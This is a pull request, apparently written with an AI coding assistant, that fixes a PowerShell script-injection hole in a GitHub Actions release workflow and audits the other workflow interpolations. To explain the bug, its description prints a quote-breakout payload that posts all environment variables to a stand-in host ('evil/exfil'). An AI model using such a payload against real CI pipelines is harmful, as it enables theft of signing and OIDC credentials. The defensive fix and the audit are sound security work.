### PR TITLE
fix(ci): prevent script injection via version/ref in privileged release step (#164)

### DIFF
--- a/.github/workflows/real-windows.yml
+++ b/.github/workflows/real-windows.yml
@@ -33,8 +33,12 @@ jobs:
       ready: ${{ vars.INTERACTIVE_RUNNER_READY == 'true' }}
     steps:
       - name: Report gate state
+        # Repo variable passed via env: (not interpolated into the script) so bash never
+        # parses it as code (#164).
+        env:
+          INTERACTIVE_RUNNER_READY: ${{ vars.INTERACTIVE_RUNNER_READY }}
         run: |
-          if [ "${{ vars.INTERACTIVE_RUNNER_READY }}" = "true" ]; then
+          if [ "$INTERACTIVE_RUNNER_READY" = "true" ]; then
             echo "::notice title=Real Windows lane ENABLED::INTERACTIVE_RUNNER_READY=true — running the interactive desktop lane on a self-hosted runner."
           else
             echo "::notice title=Real Windows lane SKIPPED::No interactive self-hosted runner registered yet (#99). This is expected — the lane is intentionally skipped, not failing. To enable: register a runner labelled [self-hosted, Windows, interactive] (see docs/self-hosted-interactive-runner.md), then set repo variable INTERACTIVE_RUNNER_READY=true."

--- a/.github/workflows/release.yml
+++ b/.github/workflows/release.yml
@@ -45,8 +45,14 @@ jobs:
       - name: Determine version
         id: ver
         shell: pwsh
+        # Untrusted values (dispatch input, ref name) are passed via env: so pwsh never
+        # parses them as code (#164). A literal '${{ ... }}' interpolation would let a
+        # value containing a quote inject PowerShell into this privileged job.
+        env:
+          RAW_VERSION: ${{ github.event.inputs.version }}
+          REF_NAME: ${{ github.ref_name }}
         run: |
-          $v = if ('${{ github.event_name }}' -eq 'workflow_dispatch') { '${{ github.event.inputs.version }}' } else { '${{ github.ref_name }}' }
+          $v = if ($env:GITHUB_EVENT_NAME -eq 'workflow_dispatch') { $env:RAW_VERSION } else { $env:REF_NAME }
           $v = $v.TrimStart('v')
           if ($v -notmatch '^\d+\.\d+\.\d+$') { throw "Version '$v' must be X.Y.Z (tag like v2.5.0)" }
           "version=$v" >> $env:GITHUB_OUTPUT


### PR DESCRIPTION
## The injection

The release **Determine version** step interpolated untrusted values straight into a `pwsh` string literal, and the `^\d+\.\d+\.\d+$` validation ran only *after* interpolation:

```yaml
run: |
  $v = if ('${{ github.event_name }}' -eq 'workflow_dispatch') { '${{ github.event.inputs.version }}' } else { '${{ github.ref_name }}' }
  $v = $v.TrimStart('v')
  if ($v -notmatch '^\d+\.\d+\.\d+$') { throw ... }   # too late — already interpolated
```

A value containing a single quote breaks out of the `'...'` literal. Example dispatch input:

```
2.5.0'; Invoke-RestMethod https://evil/exfil -Method Post -Body (Get-ChildItem Env: | Out-String); '
```

expands to `$v = if (...) { '2.5.0'; Invoke-RestMethod ...; '' }` — the injected statements execute. **Why it matters:** this runs in the release job, which holds `contents: write`, `id-token: write` (Azure OIDC federation), and Azure Trusted Signing access. Code execution here can exfiltrate the OIDC token / signing session or tamper with the artifact before signing. It requires push/dispatch access (insider or compromised contributor token, not anonymous), but the impact is high and the fix is trivial.

## The fix (env: pattern)

Pass untrusted values through `env:` and reference them as `$env:*` inside the script, so the shell receives them as data and never parses them as code:

```yaml
env:
  RAW_VERSION: ${{ github.event.inputs.version }}
  REF_NAME: ${{ github.ref_name }}
run: |
  $v = if ($env:GITHUB_EVENT_NAME -eq 'workflow_dispatch') { $env:RAW_VERSION } else { $env:REF_NAME }
```

`github.event_name` was replaced with the runner-provided `$env:GITHUB_EVENT_NAME` (no interpolation needed). Legitimate behavior is preserved exactly: `TrimStart('v')`, the `^\d+\.\d+\.\d+$` regex, the `throw` error message, and the `version`/`tag` outputs are unchanged.

Verified locally: the quote-breakout payload above is now inert data and hits the "must be X.Y.Z" rejection, while a real tag `v2.5.0` still yields `2.5.0`.

## Audit — every `${{ }}` inside a `run:` block, all workflows

| Workflow | Line | Interpolation | Source | Disposition |
|---|---|---|---|---|
| release.yml | 49 (was) | `github.event.inputs.version` | **workflow_dispatch input (attacker-controllable)** | **FIXED** — moved to `env: RAW_VERSION` |
| release.yml | 49 (was) | `github.ref_name` | **tag ref (attacker-controllable via crafted tag)** | **FIXED** — moved to `env: REF_NAME` |
| release.yml | 49 (was) | `github.event_name` | runner-controlled | Safe — replaced with `$env:GITHUB_EVENT_NAME` for consistency |
| release.yml | 67 | `steps.ver.outputs.version` | derived, already regex-validated `^\d+\.\d+\.\d+$` | Safe |
| release.yml | 116–117 | `steps.ver.outputs.tag` | derived from validated version (`v` + version) | Safe |
| real-windows.yml | 37 (was) | `vars.INTERACTIVE_RUNNER_READY` | **repo variable (maintainer-set, lower risk)** | **FIXED** — moved to `env: INTERACTIVE_RUNNER_READY` |
| real-windows.yml | 69/72/76–77 | `env.SOLUTION`, `env.CONFIGURATION` | static workflow-level literals | Safe |
| ci.yml | 54/57/61–62 | `env.SOLUTION`, `env.CONFIGURATION` | static workflow-level literals | Safe |

`winget-pkgs` job (release.yml) uses `github.ref_name` in `with:`/`if:` contexts, not inside a `run:` shell body, so it is not a shell-injection sink. The `ci.yml` conflict-markers step contains no `${{ }}` interpolation.

Both edited files pass `python yaml.safe_load`.

Fixes #164

🤖 Generated with [Claude Code](https://claude.com/claude-code)

https://claude.ai/code/session_01KHUv7FptJgKjyqXEvAxgnU

